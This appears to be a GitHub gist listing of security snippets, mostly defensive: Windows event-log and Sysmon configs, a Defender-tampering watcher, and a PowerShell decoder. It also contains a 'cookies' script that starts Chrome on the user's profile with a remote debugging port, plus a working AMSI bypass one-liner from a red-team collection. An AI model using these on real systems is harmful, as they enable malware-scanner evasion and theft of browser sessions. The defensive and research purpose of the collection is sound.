winlogbeat.event_logs:
  - name: Application
    ignore_older: 30m
  - name: Security
    ignore_older: 30m
  - name: System
    ignore_older: 30m
  - name: Microsoft-windows-sysmon/operational
    ignore_older: 30m
  - name: Microsoft-windows-PowerShell/Operational
duzvik / defenderwatch.ps1
Created June 7, 2021 08:10 — forked from svch0stz/defenderwatch.ps1
WMI Watcher for Windows Defender RealtimeMonitoring
$WMI = @{
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 5 WHERE TargetInstance ISA 'MSFT_MpPreference' AND TargetInstance.DisableRealtimeMonitoring=True"
    Action = {
        #$Global:Data = $Event
        Write-Host "Defender Configuration change - DisableRealtimeMonitoring:"$Event.SourceEventArgs.NewEvent.TargetInstance.DisableRealtimeMonitoring"(Old Value:"$Event.SourceEventArgs.NewEvent.PreviousInstance.DisableRealtimeMonitoring")"
    }
    Namespace = 'root\microsoft\windows\defender'
    SourceIdentifier = "Defender.DisableRealtimeMonitoring"
}
$Null = Register-WMIEvent @WMI
duzvik / EventDiff.ps1
Created May 28, 2021 15:18 — forked from mgraeber-rc/EventDiff.ps1
Display only new event log events - I refer to this as event log differential analysis
# Log the time prior to executing the action.
# This will be used as part of an event log XPath filter.
$DateTimeBefore = [Xml.XmlConvert]::ToString((Get-Date).ToUniversalTime(), [System.Xml.XmlDateTimeSerializationMode]::Utc)
# Do the thing now that you want to see potentially relevant events surface...
$null = Mount-DiskImage -ImagePath "$PWD\FeelTheBurn.iso" -StorageType ISO -Access ReadOnly
# Allow a moment for events to populate
Start-Sleep -Seconds 5
duzvik / ps-decody.py
Created May 24, 2021 09:31 — forked from Karneades/ps-decody.py
Simple python script to decode encoded PowerShell commands
# Karneades (2019)
# CyberChef recipe: https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)Remove_null_bytes()
import sys
from base64 import b64encode, b64decode

if len(sys.argv) < 2:
    print("Usage: python3 ps-decode.py <encodedCommand>")
    sys.exit(-1)

# PowerShell's -EncodedCommand argument is base64 over UTF-16LE text, which is
# why the CyberChef recipe above strips the null bytes after base64 decoding.
print(b64decode(sys.argv[1]).decode("utf-16-le"))
duzvik / c.ps1
Last active March 26, 2021 12:03
cookies
$UserData="$Env:LOCALAPPDATA\Google\Chrome\User Data"
#Write-Host $UserData
$DebugPort=9142
$Chrome="C:\Program Files\Google\Chrome\Application\chrome.exe"
#$app = Start-Process -FilePath $Chrome -ArgumentList "https://google.com --headless --user-data-dir=`"$UserData`" --remote-debugging-port=$DebugPort" -PassThru
$app = Start-Process -FilePath $Chrome -ArgumentList "https://google.com --user-data-dir=`"$UserData`" --remote-debugging-port=$DebugPort" -PassThru
duzvik / log_nothing.xml
Created March 16, 2021 15:12 — forked from mgraeber-rc/log_nothing.xml
A sysmon configuration that defaults to logging nothing. I use this as a baseline configuration for testing purposes where I can selectively turn on log sources by changing "include" to "exclude"
<Sysmon schemaversion="4.50">
  <HashAlgorithms>md5,sha256</HashAlgorithms>
  <EventFiltering>
    <!--Event ID 1: Process creation-->
    <ProcessCreate onmatch="include"></ProcessCreate>
    <!--Event ID 2: A process changed a file creation time-->
    <FileCreateTime onmatch="include"></FileCreateTime>
    <!--Event ID 3: Network connection-->
    <NetworkConnect onmatch="include"></NetworkConnect>
    <!--Event ID 5: Process terminated-->
# Pulled from https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# AMSI Bypass (Matt Graeber)
Normal Version
------------------------
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
#!/bin/bash
declare -a arr=(
"/tmp/.applocktx"
"/tmp/.applock"
"/usr/local/centreon/www/search.php"
"/usr/share/centreon/www/search.php"
"/usr/share/centreon/www/modules/Discovery/include/DB-Drop.php"
"/usr/share/centreon/www/htmlHeader.php"
)
duzvik / private_fork.md
Created December 28, 2020 08:47 — forked from 0xjac/private_fork.md
Create a private fork of a public repository

The repository for the assignment is public and GitHub does not allow the creation of private forks for public repositories.

The correct way of creating a private fork by duplicating the repo is documented here.

For this assignment the commands are:

  1. Create a bare clone of the repository. (This is temporary and will be removed so just do it wherever.)

git clone --bare git@github.com:usi-systems/easytrace.git